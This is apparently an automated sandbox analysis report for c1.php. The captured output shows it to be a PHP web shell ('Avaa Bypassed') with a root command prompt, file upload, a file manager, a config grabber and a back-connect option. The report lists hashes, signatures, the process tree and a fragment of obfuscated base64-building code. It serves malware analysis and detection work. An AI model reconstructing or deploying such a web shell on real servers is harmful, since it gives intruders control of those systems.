Linux
Analysis Report
c1.php
Overview
General Information
Sample name: | c1.php |
Analysis ID: | 1559579 |
MD5: | 6a68768c7f6cfdece23f0a0a7e52459f |
SHA1: | 06fb75d44661e5594f2232a3d9df2193624a5ecc |
SHA256: | e15cb76a4b1c24809328b1405766b00ac3e3b629fc3c8974efd61a677fbb821c |
Infos: |
Detection
Score: | 3 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Compiles software using common tools
Creates hidden files and/or directories
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "python" command used to interpret Python scripts
Executes the "wget" command typically used for HTTP/S downloading
Reads the 'hosts' file potentially containing internal network hosts
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1559579 |
Start date and time: | 2024-11-20 17:24:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 3m 43s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 88.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) |
Analysis Mode: | default |
Sample name: | c1.php |
Detection: | CLEAN |
Classification: | clean3.linPHP@0/0@1/0 |
- VT rate limit hit for: c1.php
Command: | php "/tmp/c1.php" |
PID: | 4677 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | <!DOCTYPE html> <html> <head> <title>404</title> <link rel="stylesheet" href="https://rawcdn.githack.com/Jenderal92/Blog-Gan/63073e604b81df6337c1917990a7330d46b22ae9/ganteng.css"> </head> <body> <div class="container"> <h1>[ Avaa Bypassed ]</h1> <div class="menu-icon" onclick="toggleSidebar()"></div> <hr> <div class="button-container"> <form method="post" style="display: inline-block;"> <input type="submit" name="Summon" value="Adminer" class="summon-button"> </form> <button type="button" onclick="window.location.href='?gas'" class="summon-button">Mail Test</button> <button type="button" onclick="window.location.href='?do=bc'" class="summon-button">BC</button> <button type="button" onclick="window.location.href='?dir=/tmp&goo=config'" class="summon-button">Config</button> </div> <hr> <select onchange="location.href = this.value;"> <option value="" selected disabled>Create File Or Folder</option> <option value="?dir=/tmp&create=file">Create File</option> <option value="?dir=/tmp&create=folder">Create Folder</option> </select> <select onchange="location.href = this.value;"> <option value="" selected disabled>Zipping</option> <option value="?dir=/tmp&hahay=unzip" >Un ZIP</option> <option value="?dir=/tmp&hahay=extract_zip" >Extract ZIP</option> </select> <hr> <div class="upload-cmd-container"> <div class="upload-form"> <h2>Upload:</h2> <form method="post" enctype="multipart/form-data"> <input type="file" name="file"> <button class="button" type="submit" name="upload">Upload</button> </form> </div> <div class="cmd-form"> <h2>Command:</h2> <form method="post"> root@: ~ $<input type='text' size='30' height='10' name='cmd'> <input type="submit" class="empty-button"> </form> </div> </div> <hr> </div> <center><h2>Filemanager</h2> <div class="breadcrumb"> DIR : <a href="?dir=/">/</a> <a href="?dir=%2Ftmp">tmp</a>/ </div> <table> <tr> <th>Name</th> <th>Type</th> <th>Size</th> <th>Permission</th> <th>Actions</th> </tr> <tr> <td> <svg style="width: 20px; 
height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.ICE-unix">.ICE-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.ICE-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.ICE-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.ICE-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.Test-unix">.Test-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.Test-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.Test-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.Test-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a 
href="?dir=%2Ftmp%2F.X11-unix">.X11-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.X11-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.X11-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.X11-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.XIM-unix">.XIM-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.XIM-unix">Rename</option> <option value="?dir=%2Ftmp&chmod=.XIM-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.XIM-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2F.font-unix">.font-unix</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">1777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=.font-unix">Rename</option> <option 
value="?dir=%2Ftmp&chmod=.font-unix">Chmod</option> <option value="?dir=%2Ftmp&delete=.font-unix">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fhsperfdata_root">hsperfdata_root</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0755</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=hsperfdata_root">Rename</option> <option value="?dir=%2Ftmp&chmod=hsperfdata_root">Chmod</option> <option value="?dir=%2Ftmp&delete=hsperfdata_root">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fsystemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Rename</option> <option 
value="?dir=%2Ftmp&chmod=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Chmod</option> <option value="?dir=%2Ftmp&delete=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-rtkit-daemon.service-gXJBUo">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fsystemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Rename</option> <option value="?dir=%2Ftmp&chmod=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Chmod</option> <option value="?dir=%2Ftmp&delete=systemd-private-630b3cc4c898474bae1eba000e7d4bb0-systemd-timedated.service-aU6XnT">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp%2Fvmware-root">vmware-root</a></td> <td> Folder</td> <td></td> <td> <span style="color: green">0700</span> </td> <td> <div class="dropdown"> <select 
onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&rename=vmware-root">Rename</option> <option value="?dir=%2Ftmp&chmod=vmware-root">Chmod</option> <option value="?dir=%2Ftmp&delete=vmware-root">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2F.X0-lock">.X0-lock</a></td> <td> File</td> <td>11 B</td> <td> <span style="color: green">0444</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2F.X0-lock">Edit</option> <option value="?dir=%2Ftmp&rename=.X0-lock">Rename</option> <option value="?dir=%2Ftmp&chmod=.X0-lock">Chmod</option> <option value="?dir=%2Ftmp&delete=.X0-lock">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2F.xfsm-ICE-TWMPB2">.xfsm-ICE-TWMPB2</a></td> <td> File</td> <td>406 B</td> <td> <span style="color: green">0600</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2F.xfsm-ICE-TWMPB2">Edit</option> <option 
value="?dir=%2Ftmp&rename=.xfsm-ICE-TWMPB2">Rename</option> <option value="?dir=%2Ftmp&chmod=.xfsm-ICE-TWMPB2">Chmod</option> <option value="?dir=%2Ftmp&delete=.xfsm-ICE-TWMPB2">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fc1.php">c1.php</a></td> <td> File</td> <td>177.21 KB</td> <td> <span style="color: green">0777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fc1.php">Edit</option> <option value="?dir=%2Ftmp&rename=c1.php">Rename</option> <option value="?dir=%2Ftmp&chmod=c1.php">Chmod</option> <option value="?dir=%2Ftmp&delete=c1.php">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fconfig-err-Tiv1RD">config-err-Tiv1RD</a></td> <td> File</td> <td>0 B</td> <td> <span style="color: green">0600</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fconfig-err-Tiv1RD">Edit</option> <option value="?dir=%2Ftmp&rename=config-err-Tiv1RD">Rename</option> <option value="?dir=%2Ftmp&chmod=config-err-Tiv1RD">Chmod</option> <option 
value="?dir=%2Ftmp&delete=config-err-Tiv1RD">Delete</option> </select> </div> </td> </tr> <tr> <td> <svg style="width: 20px; height: 20px; margin-right: 5px;" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"> <circle cx="12" cy="12" r="10"></circle> <line x1="12" y1="16" x2="12" y2="12"></line> <line x1="12" y1="8" x2="12" y2="8"></line> </svg> <a href="?dir=%2Ftmp&read=%2Ftmp%2Fdmesgtail.log">dmesgtail.log</a></td> <td> File</td> <td>283 B</td> <td> <span style="color: green">0777</span> </td> <td> <div class="dropdown"> <select onchange="location.href = this.value;"> <option value="" selected disabled>Action : </option> <option value="?dir=%2Ftmp&edit=%2Ftmp%2Fdmesgtail.log">Edit</option> <option value="?dir=%2Ftmp&rename=dmesgtail.log">Rename</option> <option value="?dir=%2Ftmp&chmod=dmesgtail.log">Chmod</option> <option value="?dir=%2Ftmp&delete=dmesgtail.log">Delete</option> </select> </div> </td> </tr> </table> </center> </div> <div class="sidebar" id="sidebar"> <div class="sidebar-content"> <div class="sidebar-close"> <button onclick="toggleSidebar()">Close</button> </div> <div class="info-container"> <h2>Server Info</h2> <ul class="info-list"> <li>Hostname: ubuntu</li> <li>PHP Version: 7.0.33-0ubuntu0.16.04.4</li> <li>Server Software: </li> <li>HDD Total Space: 8.78 GB</li> <li>HDD Free Space: 3.4 GB</li> <li>Total Domains in Server: 0</li> <li>System: Linux ubuntu 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64</li> </ul> </div> <div class="info-container"> <h2>System Info</h2> <ul class="info-list"> <label for="feature-select">Select Feature:</label> <select id="feature-select"> <option value="Safe Mode">Safe Mode: Disabled</option> <option value="Disable Functions">Disable Functions: </option> <option value="GCC">GCC: On</option> <option value="Perl">Perl: On</option> <option value="Python Version">Python Version: Off</option> 
<option value="PKEXEC Version">PKEXEC Version: On (pkexec version 0.105 )</option> <option value="Curl">Curl: On</option> <option value="Wget">Wget: On</option> <option value="Mysql">Mysql: Off</option> <option value="Ftp">Ftp: Off</option> <option value="Ssh">Ssh: Off</option> <option value="Mail">Mail: Off</option> <option value="cron">cron: Off</option> <option value="SendMail">SendMail: Off</option> </select> </ul> </div> <div class="info-container"> <h2>User Info</h2> <ul class="info-list"> <li>Username: root</li> <li>User ID: 0</li> <li>Group ID: 0</li> </ul> </div> </div> </div> <script> function toggleOptionsMenu() { var optionsMenu = document.getElementById('optionsMenu'); optionsMenu.classList.toggle('show'); } function toggleSidebar() { var sidebar = document.getElementById('sidebar'); sidebar.classList.toggle('open'); } </script> </div> <div class="footer"> <p>© 2024 <a href="https://www.blog-gan.org/">Coded By</a> Avaa Code.</p> </div> </body> </html> |
Standard Error: | PHP Notice: Undefined variable: z in /tmp/c1.php on line 2 Python 2.7.12 sh: 1: mysql: not found sh: 1: ftp: not found unknown option -- - usage: ssh [-1246AaCfGgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command] sh: 1: mail: not found cron: invalid option -- '-' usage: cron sh: 1: sendmail: not found |
- system is lnxubuntu1
- php New Fork (PID: 4684, Parent: 4677)
- dash New Fork (PID: 4685, Parent: 4684)
- php New Fork (PID: 4693, Parent: 4677)
- dash New Fork (PID: 4698, Parent: 4693)
- php New Fork (PID: 4710, Parent: 4677)
- dash New Fork (PID: 4712, Parent: 4710)
- php New Fork (PID: 4720, Parent: 4677)
- dash New Fork (PID: 4726, Parent: 4720)
- php New Fork (PID: 4740, Parent: 4677)
- dash New Fork (PID: 4743, Parent: 4740)
- php New Fork (PID: 4754, Parent: 4677)
- dash New Fork (PID: 4755, Parent: 4754)
- php New Fork (PID: 4762, Parent: 4677)
- php New Fork (PID: 4769, Parent: 4677)
- php New Fork (PID: 4778, Parent: 4677)
- dash New Fork (PID: 4781, Parent: 4778)
- php New Fork (PID: 4796, Parent: 4677)
- php New Fork (PID: 4797, Parent: 4677)
- dash New Fork (PID: 4798, Parent: 4797)
- php New Fork (PID: 4799, Parent: 4677)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
There are no malicious signatures.
Source: | Wget executable: |
Source: | Reads hosts file: |
Source: | DNS traffic detected: |
Source: | Classification label: |
Source: | Systemctl executable: |
Source: | Directory: |
Source: | Curl executable: |
Source: | Python executable: |
Source: | Wget executable: |
Source: | Stderr: PHP Notice: Undefined variable: z in /tmp/c1.php on line 2Python 2.7.12sh: 1: mysql: not foundsh: 1: ftp: not foundunknown option -- -usage: ssh [-1246AaCfGgKkMNnqsTtVvXxYy] [-b bind_address] [-c cipher_spec] [-D [bind_address:]port] [-E log_file] [-e escape_char] [-F configfile] [-I pkcs11] [-i identity_file] [-L address] [-l login_name] [-m mac_spec] [-O ctl_cmd] [-o option] [-p port] [-Q query_option] [-R address] [-S ctl_path] [-W host:port] [-w local_tun[:remote_tun]] [user@]hostname [command]sh: 1: mail: not foundcron: invalid option -- '-'usage: cronsh: 1: sendmail: not found: |
Source: | Queries kernel information via 'uname': |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | Path Interception | 1 Hidden Files and Directories | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | 1 Exfiltration Over Alternative Protocol | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | ReversingLabs |
⊘No Antivirus matches
⊘No created / dropped files found
File type: | |
Entropy (8bit): | 4.4859831414848275 |
TrID: | |
File name: | c1.php |
File size: | 181'468 bytes |
MD5: | 6a68768c7f6cfdece23f0a0a7e52459f |
SHA1: | 06fb75d44661e5594f2232a3d9df2193624a5ecc |
SHA256: | e15cb76a4b1c24809328b1405766b00ac3e3b629fc3c8974efd61a677fbb821c |
SHA512: | 9777c7ce9d6b259a701eb89ccaae7e0c0d87b7eee642099719c6bbccad1ae493b3c48344eb1172cf32cfdc015764bf777309a35bd3035cbef8164d89cb99c05d |
SSDEEP: | 1536:1PP/WT49Y9WqJ8ll6TJufgrFu0F30QA7VeZGBAZY10J:1H6vKb6EgZE30ZGOYKJ |
TLSH: | 01041DF719052F5F42601F21FCDD240ECAF52866EAAD1B95D42B3DEC23EA90CDA61817 |
File Content Preview: | <?php.$z .= "DQpA";.$z .= "aW5p";.$z .= "X3Nl";.$z .= "dCgn";.$z .= "ZXJy";.$z .= "b3Jf";.$z .= "bG9n";.$z .= "Jywg";.$z .= "TlVM";.$z .= "TCk7";.$z .= "DQpA";.$z .= "aW5p";.$z .= "X3Nl";.$z .= "dCgn";.$z .= "bG9n";.$z .= "X2Vy";.$z .= "cm9y";.$z .= "cycs |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 17:24:48.674849033 CET | 48361 | 53 | 192.168.2.20 | 8.8.8.8 |
Nov 20, 2024 17:24:48.808690071 CET | 53 | 48361 | 8.8.8.8 | 192.168.2.20 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 17:24:48.674849033 CET | 192.168.2.20 | 8.8.8.8 | 0xd69 | Standard query (0) | 256 | 256 | false |
System Behavior
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | /usr/bin/php /tmp/c1.php |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "gcc --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/gcc |
Arguments: | gcc --version |
File size: | 5 bytes |
MD5 hash: | e6f247b5be7f94b21850d0838afbb7bc |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "perl --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/perl |
Arguments: | perl --version |
File size: | 1911288 bytes |
MD5 hash: | 3bff1a7d2eef76ecdd800360d896366b |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "python --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/python |
Arguments: | python --version |
File size: | 9 bytes |
MD5 hash: | fdfa6acc26b1a187ba86772f74812876 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "pkexec --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/pkexec |
Arguments: | pkexec --version |
File size: | 23376 bytes |
MD5 hash: | 08328503c3dafada668903d0a094f11f |
Start time (UTC): | 16:24:47 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "curl --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/curl |
Arguments: | curl --version |
File size: | 190408 bytes |
MD5 hash: | 3ed0bf9e05e319049a9a40e645ef4b73 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "wget --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | - |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/wget |
Arguments: | wget --version |
File size: | 474656 bytes |
MD5 hash: | acaead6d3c5bcc35a12ab496fa834365 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "mysql --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /bin/dash |
Arguments: | sh -c "ftp --version" |
File size: | 154072 bytes |
MD5 hash: | e02ea3c3450d44126c46d658fa9e654c |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
Path: | /usr/bin/php |
Arguments: | - |
File size: | 21 bytes |
MD5 hash: | dfdca72c2ef9d3295a7b0703027330c1 |
Start time (UTC): | 16:24:48 |
Start date (UTC): | 20/11/2024 |
